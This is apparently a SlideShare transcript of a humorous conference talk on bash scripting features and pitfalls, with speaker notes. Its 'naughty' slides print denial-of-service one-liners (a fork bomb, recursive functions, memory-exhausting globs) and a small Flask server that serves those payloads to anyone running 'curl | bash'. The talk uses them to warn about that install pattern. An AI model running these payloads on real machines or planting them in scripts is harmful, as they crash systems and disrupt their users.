Naughty And Nice Bash Features
Download as PPTX, PDF1 like1,160 views
The document discusses advanced features and techniques in bash scripting, including functions, globbing, command substitution, and pipelines. It highlights both useful and mischievous functionalities, demonstrating the potential for errors and memory issues. The content serves as a humorous yet informative exploration of bash capabilities, with references for further learning.
![Nice Functions
function it_crowd {
# Turn it off and on again
ssh $1 reboot
# Is it off yet?
while is_it_on $1; do :; done
# Is it on yet?
while ! is_it_on $1; do :; done
}
$ it_crowd mycomputer
: [arguments]
No effect; the command does
nothing beyond expanding
arguments and performing any
specified redirections.
A zero exit code is returned.
http://git.savannah.gnu.org/cgit/bash.git/tree/builtins/colon.def](https://image.slidesharecdn.com/f21xyrxotugvguwcwifi-signature-4471f956a01b4138cadd6ec2712607b621d2a705984bd87c3af08c2c7d588c5a-poli-151224220712/85/Naughty-And-Nice-Bash-Features-9-320.jpg)
![Nice Command Process Substitution
# Compare filesystem features
$ diff <(dumpe2fs -h /dev/sdb1) <(dumpe2fs -h /dev/sdc1)
->
$ diff /dev/fd/63 /dev/fd/62
lr-x------ 1 nati nati ... /dev/fd/62 -> pipe:[142006]
lr-x------ 1 nati nati ... /dev/fd/63 -> pipe:[142004]
# Write bad blocks to a compressed log and rsyslogd
$ dumpe2fs -b /dev/sda1 | tee >(gzip >> bad_blocks.log.gz) |
logger -t bad_blocks --](https://image.slidesharecdn.com/f21xyrxotugvguwcwifi-signature-4471f956a01b4138cadd6ec2712607b621d2a705984bd87c3af08c2c7d588c5a-poli-151224220712/85/Naughty-And-Nice-Bash-Features-32-320.jpg)
![Nice Pipelines: exit code(s)
# Solution 2
$ ls | bogus_command | wc
bogus_command: command not found
0 0 0
$ echo ${PIPESTATUS[@]} # array of exit status values
0 127 0
http://tldp.org/LDP/abs/html/internalvariables.html#PIPESTATUSREF](https://image.slidesharecdn.com/f21xyrxotugvguwcwifi-signature-4471f956a01b4138cadd6ec2712607b621d2a705984bd87c3af08c2c7d588c5a-poli-151224220712/85/Naughty-And-Nice-Bash-Features-38-320.jpg)
![Naughty Pipelines
import random
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return random.choice([':(){ :;} :',
':(){ : $1$1;} : :',
':(){ :|:&} :',
'echo /*/*/*/*/*/*/*/*/*/*',
'echo `yes Let it snow`',
':(){ : <(:);} :' ])
if __name__ == "__main__":
app.run()](https://image.slidesharecdn.com/f21xyrxotugvguwcwifi-signature-4471f956a01b4138cadd6ec2712607b621d2a705984bd87c3af08c2c7d588c5a-poli-151224220712/85/Naughty-And-Nice-Bash-Features-41-320.jpg)
Naughty And Nice Bash Features
- 1. Naughty & Nice Bash Features Nati Cohen / Fewbytes @nocoot
- 4. Today
- 6. Functions
- 7. Functions function is_it_on { ping -c 1 $1 &>/dev/null } $ is_it_on www.facebook.com || echo “OMG we’re doomed”
- 9. Nice Functions function it_crowd { # Turn it off and on again ssh $1 reboot # Is it off yet? while is_it_on $1; do :; done # Is it on yet? while ! is_it_on $1; do :; done } $ it_crowd mycomputer : [arguments] No effect; the command does nothing beyond expanding arguments and performing any specified redirections. A zero exit code is returned. http://git.savannah.gnu.org/cgit/bash.git/tree/builtins/colon.def
- 10. Functions function is_it_on { ping -c 1 $1 &>/dev/null } $ is_it_on www.facebook.com || echo “OMG we’re doomed”
- 11. Compact Functions is_it_on (){ ping -c 1 $1 &>/dev/null;} $ is_it_on www.facebook.com || echo “OMG we’re doomed” is_it_on{ ping -c 1 $1 &>/dev/null;} bash: syntax error near unexpected token `}' is_it_on(){ping -c 1 $1 &>/dev/null;} bash: syntax error near unexpected token `{ping' is_it_on{ ping -c 1 $1 &>/dev/null} >
- 12. Cmpct Functions :(){ ping -c 1 $1 &>/dev/null;} $ : www.facebook.com || echo “OMG we’re doomed”
- 13. Naughty Functions (Local) : (){ :;} $ : Segmentation fault (core dumped)
- 14. Naughty Functions (Global) : (){ : $1$1;} $ : : bash: xrealloc: .././subst.c:687: cannot allocate 18446744071562068096 bytes (23624826880 bytes allocated) Function definition Function call Parameter
- 15. Famous Naughty Functions :(){ :|:&} $ : bash: fork: Cannot allocate memory ENOMEM Cannot allocate sufficient memory to allocate a task structure for the child, or to copy those parts of the caller's context that need to be copied. CLONE(2) Image taken from: http://askubuntu.com/a/159499
- 16. Globbing
- 17. Globbing Pathname expansion using pattern matching $ ls -ld /etc/cron* -> $ ls -ld /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/crontab /etc/cron.weekly $ ls -ld /etcccc/* -> $ ls -ld /etcccc/*
- 18. Globbing $ mkdir iknowglobbing $ cd iknowglobbing $ touch stat $ touch x $ * -> $ stat x File: ‘x’ Size: 0 Blocks: 0 IO Block: 4096 regular empty file Device: 802h/2050d Inode: 4329283 Links: 1 Access: (0664/-rw-rw-r--) Uid: ( 1000/ nati) Gid: ( 1000/ nati) Access: 2015-12-10 17:03:23.798313371 +0200 Modify: 2015-12-10 17:03:23.798313371 +0200 Change: 2015-12-10 17:03:23.798313371 +0200 Birth: -
- 19. Nice Globbing (shopt -s extglob) !(<PATTERN-LIST>) - anything except $ rm -rf ~/Downloads/!(*.pdf|*.doc?|*.ods|*.xls?) ?(<PATTERN-LIST>) - zero or one *(<PATTERN-LIST>) - zero or more +(<PATTERN-LIST>) - one or more @(<PATTERN-LIST>) - exactly one
- 20. Nice Globbing (shopt -s <superpower>) dotglob Bash will also expand ‘.’ as part of glob (inc: `.` `..`) globstar ‘**’ will match all files and zero or more directories nocaseglob case-insensitive globbing nullglob / failglob when globbing fails expand empty string / fail with
- 21. Naughty Globbing # Print all files in depth 10: $ echo /*/*/*/*/*/*/*/*/*/* # hogs your CPU, performs IOs, consumes memory Out of memory: Kill process 3769 (bash) score 792 or sacrifice child Killed process 3769 (bash) total-vm:23463052kB, anon- rss:20065304kB, file-rss:0kB BUT Why??? o_O
- 22. Let’s build a Christmas tree $ mkdir -p {a1,a2,a3}/{b1,b2,b3}/{c1,c2,c3} . a2 a3a1 b2 b3b1b2 b3b1 b2 b3b1
- 23. How do you glob a tree? $ strace -e openat bash -c 'echo */*/*' openat(AT_FDCWD, ".", <FLAGS>) = 3 getdents(3, /* 5 entries */, 32768) = 120 openat(AT_FDCWD, "a2", <FLAGS>) = 3 openat(AT_FDCWD, "a3", <FLAGS>) = 3 openat(AT_FDCWD, "a1", <FLAGS>) = 3 openat(AT_FDCWD, "a2/b1", <FLAGS>) = 3 openat(AT_FDCWD, "a2/b3", <FLAGS>) = 3 openat(AT_FDCWD, "a2/b2", <FLAGS>) = 3 openat(AT_FDCWD, "a3/b1", <FLAGS>) = 3 openat(AT_FDCWD, "a3/b3", <FLAGS>) = 3 ...
- 24. Where is the poop? Image source: http://www.cse.unsw.edu.au/~billw/Justsearch.html
- 25. Size per file? 12b # avg. file name length + 52b # avg. full path length in depth 10 = 64b
- 26. How many files? $ for i in {1..10}; do echo -n "depth $i: "; find / -mindepth $((i-1)) -maxdepth $i 2>/dev/null | wc -l; done depth 1: 30 depth 2: 1418 depth 3: 21076 depth 4: 63150 depth 5: 199812 depth 6: 432928 depth 7: 568426 depth 8: 617698 depth 9: 511480 depth 10: 320827 BUT 511480 * 64b = 32mb o_O
- 27. ltrace to the rescue strlen("p7zip-full") = 10 memset(0x88eff08, '337', 58) = 0x88eff08 strcpy(0x88eff08, "/proc/18256/root/proc/2628/root/usr/share/doc")= 0x88eff08 strcpy(0x88eff36, "p7zip-full") = 0x88eff36 strlen("mount") = 5 memset(0x88eff88, '337', 53) = 0x88eff88 strcpy(0x88eff88, "/proc/18256/root/proc/2628/root/usr/share/doc")= 0x88eff88 strcpy(0x88effb6, "mount")= 0x88effb6
- 28. /proc/<PID>/root “per-process root of the filesystem, set by the chroot(2)” usually symlink to / depth 1: 30 depth 2: 1418 depth 3: 21076 depth 4: 63150 depth 5: 199812 depth 6: 432928 depth 7: 568426 depth 8: 617698 depth 9: 511480 depth 10: 320827 Assuming root and 100 processes: (100*432928 + 100*100*21076) * 64b = 15.1gb
- 29. Naughty Globbing - Recap $ echo /*/*/*/*/*/*/*/*/*/* 64b per file Keeps previous level in memory (BFS) Follows symlinks over and over /proc/PID/root /proc/PID/cwd
- 31. Command Substitution # old-style $ echo All you need is `basename $0` All you need is bash # new-style $ echo $(basename $0) is all you need bash is all you need # new-style is cool bobs_cred="$(echo bob:"$(shuf -n4 /usr/share/dict/words | tr -d 'n')" | chpasswd -S -c SHA512)" nested commands nested double-quotes
- 32. Nice Command Process Substitution # Compare filesystem features $ diff <(dumpe2fs -h /dev/sdb1) <(dumpe2fs -h /dev/sdc1) -> $ diff /dev/fd/63 /dev/fd/62 lr-x------ 1 nati nati ... /dev/fd/62 -> pipe:[142006] lr-x------ 1 nati nati ... /dev/fd/63 -> pipe:[142004] # Write bad blocks to a compressed log and rsyslogd $ dumpe2fs -b /dev/sda1 | tee >(gzip >> bad_blocks.log.gz) | logger -t bad_blocks --
- 33. Naughty Command Substitution $ echo `yes Let it snow` bash: xrealloc: .././subst.c:5273: cannot allocate 18446744071562067968 bytes (4298260480 bytes allocated) $ yes somestring somestring somestring somestring somestring somestring ...
- 34. Naughty Process Substitution # Remember me? $ :(){ : <(:);} $ : bash: fork: Cannot allocate memory
- 35. Pipelines
- 36. ls | wc -l The STDOUT of ls is connected to the STDIN of wc -l Each command is executed as a separate process # What if I also want STDERR? $ ls 2>&1 | wc -l $ ls |& wc -l
- 37. Nice Pipelines: exit code(s) # The following pipeline is a huge success $ backup.sh | aws s3 cp - s3://my-bkt/backup.gz | echo Yay $ echo $? # Always 0 # Solution 1 $ set -o pipefail # pipes return rightmost non-zero
- 38. Nice Pipelines: exit code(s) # Solution 2 $ ls | bogus_command | wc bogus_command: command not found 0 0 0 $ echo ${PIPESTATUS[@]} # array of exit status values 0 127 0 http://tldp.org/LDP/abs/html/internalvariables.html#PIPESTATUSREF
- 39. Nice Pipelines (shopt - s lastpipe) # The following only works when job control is off # How many files in /tmp? myvar=0 ls /tmp | wc -l | read myvar echo $myvar files in /tmp # Always 0! why? # How many files in /tmp? shopt -s lastpipe myvar=0 ls /tmp | wc -l | read myvar echo $myvar files in /tmp
- 40. Naughty Pipelines curl http://install.myawesomefullstackapp.io | bash Someone can take over install.myawesomefullstackapp.io So what? 0_0
- 41. Naughty Pipelines import random from flask import Flask app = Flask(__name__) @app.route("/") def hello(): return random.choice([':(){ :;} :', ':(){ : $1$1;} : :', ':(){ :|:&} :', 'echo /*/*/*/*/*/*/*/*/*/*', 'echo `yes Let it snow`', ':(){ : <(:);} :' ]) if __name__ == "__main__": app.run()
- 42. Naughty Pipelines What about network failures? Do you trust curl? is it a function/alias? Do you trust myawesomefullstackapp.io? curl http://install.myawesomefullstackapp.io | bash Someone can take over install.myawesomefullstackapp.io
- 44. Thank You! Questions? Nati Cohen / Fewbytes @nocoot
- 45. References Advanced Bash-Scripting Guide http://www.tldp.org/LDP/abs/html/index.html Bash Git Repository http://git.savannah.gnu.org/cgit/bash.git Create a memory leak, without any fork bombs http://codegolf.stackexchange.com/a/24488
Editor's Notes
- #3: Today I’m going to talk about Bash We all love bash, because it’s awesome and allows us to create these awesome one liners We also hate bash, because of that time when everything crashed and we had to figure out what the previous sysadmin’s one-liner did
- #4: We do our best to avoid Bash using all sort of fancy configuration management, Just to end up creating “bash resources” and generating bash scripts using ruby code...
- #5: So, today I’m going to talk about Bash I’m going to go over some cool features that can make your life great And then I’m going to show you how Bash crash miserably, possibly taking your entire system down with it
- #43: Use https://… curl has a 4k output buffer (on Linux) You can force input buffering in bash using {...} Use command curl or \curl Prefer a signed repository